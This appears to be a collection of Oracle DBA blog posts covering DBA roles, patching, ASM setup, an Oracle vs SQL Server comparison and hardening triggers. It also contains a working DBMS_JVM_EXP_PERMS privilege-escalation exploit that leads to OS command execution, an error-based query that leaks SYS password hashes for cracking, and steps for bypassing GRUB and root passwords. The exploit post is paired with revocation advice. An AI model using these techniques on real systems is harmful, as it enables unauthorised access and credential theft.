  • Planning for backup and recovery of database information
  • Maintaining archived data on tape
  • Backing up and restoring the database
  • Contacting Oracle Corporation for technical support


For more information read the Oracle documentation here.

In a big company that requires 24-hour monitoring of more than one database, you cannot assign everything to this one person; he will be killed. So two kinds of DBA appeared to reduce the tasks:
Development DBA and Production DBA, each with its own job and tasks.

Development DBA:
As you can see from the name, this is the person who works closely with the development team to make sure database design and performance are working fine without any problems.

Production DBA:
The person responsible for ensuring that the company's database is healthy and running without any problems. It's not an easy job, since this type of database is the main database for the company, so you have to ensure it's working fine or you will be fired.

I mentioned before on my blog how to become a DBA and what you need for that: a good understanding of the Oracle database, an understanding of the underlying operating system, how Oracle acquires and manages resources, knowledge of both database and system performance tuning, communication skills, management, and the ability to handle multiple projects and deadlines. These are all hints for becoming a DBA. Read my post "how to become DBA" here.

Now that you have some knowledge of the DBA's tasks and what he does, let's talk about the APPS DBA.

Simply, the equation is:
ORACLE APPS DBA = Application* + Database.

*The application here is the Fusion Middleware products from Oracle.

If you are familiar with all the previous tasks then you are able to be an Oracle APPS DBA. The Oracle APPS DBA role includes all Oracle DBA tasks, and it's a very big subject to learn and explore.

So the tasks for an APPS DBA are:
  • All Oracle DBA tasks.
  • Patching
  • Cloning
  • Maintaining Oracle Applications.
  • Installing Oracle EBS.
In conclusion, an Oracle APPS DBA is an Oracle DBA, and because of this he can switch easily between these job roles. Don't let this disappoint you: an Oracle DBA can also switch to APPS DBA, but he must read a LOT.

Thank you 
Osama Mustafa  


Describe Oracle Patches

According to the Oracle documentation, a patch is a program (set of instructions) to fix a particular problem or enhance/add a particular feature in an existing program/product/software. There are four kinds of Oracle patches:

  • One-off patches (bug fix)
  • CPU (security patches)
  • Upgrade patches (bug fixes)
  • PSU (bug fixes and security patches)
There is another kind, called Bundle Patches, for Windows and Exadata.
The two kinds of patch that people get a little confused about are CPU and PSU. What are they? When should I use them? Is there any difference between them?

The first thing you need to know is that, since they have different names, they are certainly different.

CPU:  security fixes each quarter rather than the cumulative database.

PSU: the same as CPU patches, but they include both the security fixes and priority fixes. Note: once a PSU is applied, only PSUs can be applied in future quarters until the database is upgraded to a new base version.
Which means you can't apply both CPU and PSU on the same database.

Some MOS notes that could be useful:

Introduction to Oracle Patch Set Updates (PSU) [ID 854428.1]
Quick Reference to Patchset Patch Numbers [ID 753736.1]
Quick Reference to Patch Numbers for Database PSU, SPU(CPU), Bundle Patches and Patchsets [ID 1454618.1]
New Patch Nomenclature for Oracle Products [ID 1430923.1]

PSUs contain fixes for bugs that cause instance crashes, wrong results and data corruption. On the other hand, dictionary changes, major algorithm changes and optimizer plan changes are not fixed by PSUs.

To check the applied PSU patches, you need to run:
opatch lsinventory -bugs_fixed | grep -i 'DATABASE PSU'
And if you need to check CPU:
select * from registry$history;

Thank you
Osama mustafa

Saturday, April 13, 2013

DBMS_JVM_EXP_PERMS OS Command Execution / Hack Oracle

DBMS_JVM_EXP_PERMS is a package that allows any user with the CREATE SESSION privilege to grant themselves Java IO privileges. The issue was identified by David Litchfield. You also need to know that this technique only works on Windows, and the affected Oracle database versions are 10gR2, 11gR1 and 11gR2.

The demonstration below shows how it is used:

SQL> CONNECT / AS SYSDBA
Connected.
SQL> CREATE USER Test IDENTIFIED BY Test;

User created.

SQL> GRANT CREATE SESSION TO Test;

Grant succeeded.

SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 'TEST';

no rows selected

SQL> CONNECT Test/test
Connected.

SQL> DECLARE
   POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
   CURSOR C1 IS SELECT
'GRANT','GREMLIN','SYS','java.io.FilePermission','<FILES>>','execute','ENABLED' FROM DUAL; 
  BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
  END;
  /

PL/SQL procedure successfully completed.

SQL> CONNECT / AS SYSDBA
Connected.

SQL> COL TYPE_NAME FOR A30;
SQL> COL NAME FOR A30;
SQL> COL ACTION FOR A10;
SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 'TEST';

TYPE_NAME                      NAME                           ACTION
------------------------------ ------------------------------ ----------
java.io.FilePermission         <>                  execute

As you can see, at first user Test only has the CREATE SESSION privilege, but after using the above package he can now execute any OS command using Java code.

select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

To secure your database against this :

revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on "oracle/aurora/util/Wrapper" from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;
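
To confirm that the hardening statements above took effect, and to spot accounts that already hold the kind of Java policy entry shown in the demonstration, a DBA can query the data dictionary. This is an added example, not code from the original post; treating the DBA and JAVASYSPRIV roles as the "expected" holders is an assumption to adjust for your site.

```sql
-- Added verification example (not from the original post).
-- Run as a DBA after applying the REVOKE/GRANT statements above.

-- 1. Who can still EXECUTE the SYS packages named in the hardening steps?
--    PUBLIC should no longer appear as a grantee, and DBMS_JVM_EXP_PERMS
--    should list IMP_FULL_DATABASE and EXP_FULL_DATABASE.
SELECT table_name AS package_name,
       grantee,
       grantor
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    privilege = 'EXECUTE'
AND    table_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA', 'DBMS_JAVA_TEST')
ORDER  BY table_name, grantee;

-- 2. Which grantees hold a Java file permission with the "execute" action,
--    and do they hold a role that would explain it?
--    Assumption: DBA and JAVASYSPRIV are the roles you expect to see here.
--    Rows marked NO (such as TEST in the demonstration) need review.
SELECT p.grantee,
       p.kind,
       p.name,
       p.action,
       p.enabled,
       CASE
         WHEN EXISTS (SELECT 1
                      FROM   dba_role_privs r
                      WHERE  r.grantee = p.grantee
                      AND    r.granted_role IN ('DBA', 'JAVASYSPRIV'))
         THEN 'YES'
         ELSE 'NO'
       END AS has_dba_or_javasyspriv
FROM   dba_java_policy p
WHERE  p.type_name = 'java.io.FilePermission'
AND    INSTR(LOWER(p.action), 'execute') > 0
ORDER  BY has_dba_or_javasyspriv, p.grantee;
```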

Thank you
Osama Mustafa

Friday, April 12, 2013

Hack Sys Password With Simple Way

Sometimes you want to find out the SYS password in the simplest way. If you have any user with the DBA role, you can do the following:

SQL>  select utl_inaddr.get_host_name((select username||'='||password from dba_users where rownum=1)) from dual;

 select utl_inaddr.get_host_name((
        *
ERROR at line 1:
ORA-29257: host SYS=8A8F025737A9097A unknown
ORA-06512: at "SYS.UTL_INADDR", line 4
ORA-06512: at "SYS.UTL_INADDR", line 35
ORA-06512: at line 1
Now you can use any software or online site to hack this password.

Thank you
Osama Mustafa

Monday, April 8, 2013

Basic Database Security Guidelines

Implementing database security is not an easy process. It's complex, since security has to be looked at in the OS layer, database, network, application code, and backup. There are a lot of things you need to check, and if you need a secure database you can't ignore any one of these components.

You need to know that even experts/gurus do not have a complete understanding of this list; maybe they have knowledge about it, but not that much. The most important thing in securing a (new) database or securing an application is understanding the security model very early in the development process, and how to develop it. You can read the book "Oracle security: Step-by-step" by Pete Finnigan; he mentions a lot of basic steps to secure an Oracle database.


From a high level perspective, security is always about risk. If you think that your system is impenetrable, think again. Someone else will always be building a better mousetrap.

For example, as DBAs we might ask ourselves about SQL injection, one of the top ten threats to databases. It happens because somebody is writing a web application that accesses your database, which means that if this code is written incorrectly, what happens if a hacker gets access to your database through this code? Because of this, the DBA needs to understand who has access to the database and make sure the developers are accessing it in a secure way.

Internal/external hackers are going to search for holes in your application to get in. As we know, one of the attack types used is the buffer overflow; because of this you need to keep your system up to date with patches. Most people don't do that, since they worry that a patch will break their system or application.

Today a lot of people are ignoring the security side of the job. Many companies don't have the resources. Until you get hacked, and until you lose data, you think you can get by with minimal security.

I mentioned some of this before, with examples, in my article about basic steps to secure Oracle Database. I advise you today to bookmark this to keep updated with Oracle security patches. There are a lot of tips to talk about, and I need to share them here as soon as I can.

Thank you
Osama Mustafa

ORA-0131: insufficient privileges/could not validate ASMSNMP password

This error is related to the ASM instance. It usually happens when you are trying to create dbconsole. The solution is simple and not that complicated; just follow the instructions below.


Choose one of the RAC (Real Application Clusters) nodes and run the below command as the grid user:

 orapwd file=/u01/app/11.2.0/grid/dbs/orapw+ASM password=

Now copy the file (orapw+ASM) to the other nodes using scp or any FTP software you like. To learn about scp, see here. Check the below example:

scp orapw+ASM :/u01/app/11.2.0/grid/dbs/


Back to Oracle User :

export ORACLE_SID=+ASM1
export ORACLE_HOME=/u01/app/11.2.0/grid
$ sqlplus / as sysasm
SQL>create user asmsnmp identified by ;
SQL> grant sysdba to asmsnmp;

Thank you
Osama Mustafa

Saturday, April 6, 2013

Hack Root Password With Protected Grub

I previously posted an article about "Hack Root Password With Protected Grub" Here.

But what if GRUB is locked by a password and you forgot the root password? There's always a way to do it, but you need the same installation media as the operating system (I never tried to use a different distribution). After booting from it:






In the above screen, type "linux rescue" and then press Enter.

Then follow the instructions and enter Bash:

chroot /mnt/sysimage [Enter]
cd /boot/grub [Enter]
vi menu.lst

In that file you will see the word "password". Remove that line; this removes the GRUB password. After you save the file the OS will reboot, but this time GRUB will be unprotected. Remove the CD and follow the normal instructions in article number one Here.

Thank you
Osama Mustafa


Thursday, April 4, 2013

rdesktop: A Remote Desktop Protocol Client

rdesktop is an open source client for Windows Remote Desktop Services, capable of natively speaking Remote Desktop Protocol (RDP) in order to present the user's Windows desktop. rdesktop is known to work with Windows versions such as NT 4 Terminal Server, 2000, XP, 2003, 2003 R2, Vista, 2008, 7, and 2008 R2. Click Here.


You can install the package using yum; the command below checks whether it is installed:
# rpm -qa rdesktop

According to the website, to connect to Windows from Linux you need to use -u, which indicates the username, followed by the hostname, like this:
# rdesktop -u Administrator osama

osama: hostname
Administrator: username






Useful !!!


Thank you
Osama mustafa

Wednesday, April 3, 2013

Reset/Hack Linux Root Password ( Unprotected GRUB )

Do you want to learn something new? Hack/reset the Linux root password? Then continue reading.

Root is the user name or account that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the superuser.

What if I forget the root password? Check the below.

Restart the server and you will see this screen; pause it by pressing an arrow key:





Second, press "a", then add "1" as in the below screen; when finished, press Enter:



Now Black Screen :




Print "Runlevel"




Then reset the root password by typing the "passwd" command, as below:



Note: this method works with Red Hat, Fedora and CentOS; I didn't try it on Ubuntu.

Thank you
Osama mustafa







Tuesday, April 2, 2013

Oracle Database vs Sql Server Security


Which one is the more secure ?

The above question was asked before, and will be asked today and in the future, but what is the answer? Before starting to answer this question, we need to discuss some points.

As an introduction, SQL Server is a database product from Microsoft Corporation with the following version list:

  • SQL Server 2012
  • SQL Server 2008 R2
  • SQL Server 2008
  • SQL Server 2005
  • SQL Server 2000
  • SQL Server 7.0
On the other hand, we have Oracle Database, which is an RDBMS (Relational Database Management System) with the following version list:
 
  • Oracle7
  • Oracle8 Database
  • Oracle8i Database
  • Oracle9i Database
  • Oracle Database 10g
  • Oracle Database 11g
Each database release includes new features; these features could be related to high availability, database features and security features. I try to be fair in my judgment. Let's go back to the question: which is more secure, Oracle Database or Microsoft SQL Server, and why?

I read a lot of research regarding this question, and most of it claims that SQL Server is more secure than Oracle Database, but why? Oracle is the best database for large organizations and can store more data with great security. When I say great security, there are a lot of solution products from Oracle such as Database Vault, Audit Vault and Data Masking. But for small solutions and organizations, most of them use SQL Server.

I read this report by David Litchfield here. It was published in November 2006 and claims that SQL Server is more secure than Oracle Database. Also, when you compare these two databases you need to know the main differences between them:

Microsoft SQL Server only works on one platform (Windows), is easy to manage, most of the administration is through a GUI (very friendly), it is simple to install, and SQL Server costs less than Oracle (much less) in licensing fees. All this leads me to the following:

  • Since SQL Server is easy to install and administer, the performance is usually fine.
  • The only way to scale a system built on SQL Server technology is to add more memory and CPU to the single server hosting the database.
  • As mentioned before, SQL Server supports only one platform.
On the other hand, Oracle supports all platforms (Linux, Unix, Windows, HP, AIX and Sun... and sorry, I forgot to mention others). I will not say it's easy to install, but the documentation is available for free, and if you follow it you will not be lost. Oracle Database is an enterprise solution, which means you get a database that stores huge data and supports high-availability clusters (SQL Server does not support it), and it introduces a lot of backup and recovery solutions, Data Guard being one of them. Because of this it's expensive and costly for the company. Don't forget the main reason: an Oracle DBA's salary is more than a SQL Server DBA's, which means companies will study this case before looking for solutions.

Also, to be fair, Oracle Support takes some time to answer you and solve the issue or database vulnerability; SQL Server support, however, is amazing and solves the issue or database vulnerability in 24 hours or less.

Since Oracle Database works for large organization businesses such as financial and insurance companies, it is the aim of any hacker (I would like to mention here that a hacker does not look for a small company to hack; it needs to be something worth it if he gets caught), which puts it under attack from any hacker. In my articles I mentioned that no system is 100% secure, but you can make it harder for any hacker to access your data, and Oracle provides products to do that: Database Vault, Audit Vault, Database Firewall and encryption.

Another point I would like to mention here (take it also as a point when you compare): Oracle works on more than one platform. So will focusing on one platform's security be the same as focusing on five/six/... platforms' security? You should answer this question, not me!

Oracle has the capacity to run large databases and has many performance improvement features; the performance can involve hardware or database (SQL Server only hardware). Which is more secure?
It's completely up to you, but don't miss or ignore the points I mentioned before in this article.

Thank you
Osama Mustafa

Monday, April 1, 2013

Sys Password and Alter User Privileges


While I was browsing I found this topic, which is really amazing and useful if you are interested in securing your database. I mentioned before in my posts that to secure a database you need to start with simple steps first; the below is one of them:
SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
IF ora_sysevent='ALTER' and ora_dict_obj_type = 'USER' and
(ora_dict_obj_name = 'SYSTEM' or ora_dict_obj_name = 'SYS')
THEN
RAISE_APPLICATION_ERROR(-20003,
'You are not allowed to alter SYSTEM/SYS user.');
END IF;
END;
/

Trigger created.

SQL> conn scott/tiger
Connected.

SQL>alter user system identified by new_password;
alter user system identified by new_password
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user sys identified by new_password;
alter user sys identified by new_password
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5
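
The trigger above is created ON SCOTT.schema, so it fires only for ALTER statements issued by sessions connected as SCOTT; any other account holding ALTER USER is unaffected. A database-wide variant follows as an added example, not code from the original post; the trigger name and the exemption for SYS are assumptions.

```sql
-- Added example (not from the original post): database-wide variant.
-- Creating it requires the ADMINISTER DATABASE TRIGGER privilege.
-- The trigger name and the SYS exemption below are assumptions.
CREATE OR REPLACE TRIGGER prohibit_alter_sys_system_db
BEFORE ALTER ON DATABASE
BEGIN
  IF ora_dict_obj_type = 'USER'
     AND ora_dict_obj_name IN ('SYS', 'SYSTEM')
     AND ora_login_user NOT IN ('SYS')   -- assumed allow-list
  THEN
    RAISE_APPLICATION_ERROR(-20003,
      'You are not allowed to alter SYSTEM/SYS user.');
  END IF;
END;
/

-- Confirm the trigger exists, is enabled and has database scope.
SELECT owner, trigger_name, triggering_event, base_object_type, status
FROM   dba_triggers
WHERE  trigger_name = 'PROHIBIT_ALTER_SYS_SYSTEM_DB';

-- Accounts that can issue ALTER USER, or that can disable or drop the
-- trigger and so remove the control; review this list periodically.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege IN ('ALTER USER',
                     'ADMINISTER DATABASE TRIGGER',
                     'ALTER ANY TRIGGER',
                     'DROP ANY TRIGGER')
ORDER  BY privilege, grantee;
```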